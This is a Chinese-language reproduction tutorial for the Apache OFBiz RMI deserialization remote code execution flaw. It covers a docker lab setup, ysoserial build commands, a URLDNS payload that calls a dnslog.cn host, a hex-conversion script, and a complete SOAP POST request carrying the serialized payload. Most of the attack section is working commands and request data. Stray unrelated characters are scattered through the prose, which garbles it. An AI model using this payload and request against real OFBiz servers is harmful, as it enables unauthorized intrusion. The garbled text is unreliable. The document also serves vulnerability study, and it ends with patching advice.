0x00簡(jiǎn)介

Apache OFBiz全稱是The ApacheOpen For Business Project。是開放的電子商務(wù)平臺(tái)鳍烁，是一個(gè)非常著名的開源項(xiàng)目，提供了創(chuàng)建基于最新的J2EE/XML規(guī)范和技術(shù)標(biāo)準(zhǔn)，構(gòu)建大中型企業(yè)級(jí)、快平臺(tái)炭晒、跨數(shù)據(jù)庫(kù)、跨應(yīng)用服務(wù)器的多層甥角、分布式電子商務(wù)類WEB應(yīng)用系統(tǒng)的框架网严。OFBiz幾乎實(shí)現(xiàn)了所有的J2EE核心設(shè)計(jì)模式，各個(gè)模塊之間的耦合比較松散嗤无，用戶能夠比較容易<typo id="typo-203" data-origin="的" ignoretag="true">的</typo>根據(jù)自己的需要進(jìn)行拆卸震束，非常靈活。

image

0x01漏洞概述

2021年3月22日 Apache OFBiz官方發(fā)布安全更新当犯，修復(fù)了一處由RMI反序列化造成的遠(yuǎn)程代碼執(zhí)行漏洞垢村。攻擊者可構(gòu)造惡意請(qǐng)求，觸發(fā)反序列化嚎卫，從而造成任意代碼執(zhí)行嘉栓，控制服務(wù)器。

0x02影響版本

Apache OFBiz < 17.12.06

0x03環(huán)境搭建

1拓诸、本次漏洞復(fù)現(xiàn)使用docker環(huán)境搭建侵佃，使用docker搜索ofbiz

docker search ofbiz

image

2、選擇第二個(gè)奠支，使用命令拉取環(huán)境

docker pull opensourceknight/ofbiz

image

3馋辈、拉取完畢后使用命令運(yùn)行漏洞環(huán)境，使用ps查看是否啟動(dòng)成功

docker run -d -p 8080:8080 -p 8443:8443 opensourceknight/ofbiz

image

0x04漏洞復(fù)現(xiàn)

1倍谜、在GitHub上下載java反序列化利用工具ysoserial,

git clone https://github.com/frohoff/ysoserial.git

image

2迈螟、進(jìn)入ysoserial目錄使用maven下載編譯需要<typo id="typo-716" data-origin="得" ignoretag="true">得</typo>包，編譯成功為以下圖片

mvn clean package -DskipTests

image

3枢劝、在ysoserial目錄可以看到有一個(gè)target目錄井联，進(jìn)入此目錄

image7.png

4卜壕、準(zhǔn)備一個(gè)dnslog地址您旁，使用以下命令生成編碼保存到123.ot

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://w5voea.dnslog.cn >123.ot

image

5、使用python腳本轉(zhuǎn)成hex

import binascii

filename = '123.ot'

with open(filename, 'rb') as f:

content = f.read()

print(binascii.hexlify(content))

image

6轴捎、在瀏覽器訪問以下地址然后使用Burp抓包發(fā)送到重放模塊

https://your-ip:8443/webtools/control/SOAPService

image

7鹤盒、將GET改為POST在包內(nèi)添加以下數(shù)據(jù)，將數(shù)據(jù)內(nèi)cus-obj中的代碼修改成自己生成的代碼侦副，把dnslog地址也換成自己的侦锯，修改完后發(fā)送

POST /webtools/control/SOAPService HTTP/1.1

Host: 172.16.1.146:8443

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Content-Type: application/xml

Content-Length: 1023

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">

<soapenv:Header/>

<soapenv:Body>

<ser>

<map-HashMap>

<map-Entry>

<map-Key>

<cus-obj>aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff7400107735766f65612e646e736c6f672e636e74000071007e0005740004687474707078740017687474703a2f2f7735766f65612e646e736c6f672e636e78</cus-obj>

</map-Key>

<map-Value>

<std-String value="http://w5voea.dnslog.cn"/>

</map-Value>

</map-Entry>

</map-HashMap>

</ser>

</soapenv:Body>

</soapenv:Envelope>

image

8、查看dnslog

image

9秦驯、在github上相關(guān)的利用腳本尺碰，這里就不做演示

0x05修復(fù)建議

1、升級(jí)到最新版本或安全版本

https://ofbiz.apache.org/download.html#vulnerabilities

參考地址: https://blog.csdn.net/xuandao_ahfengren/article/details/115163971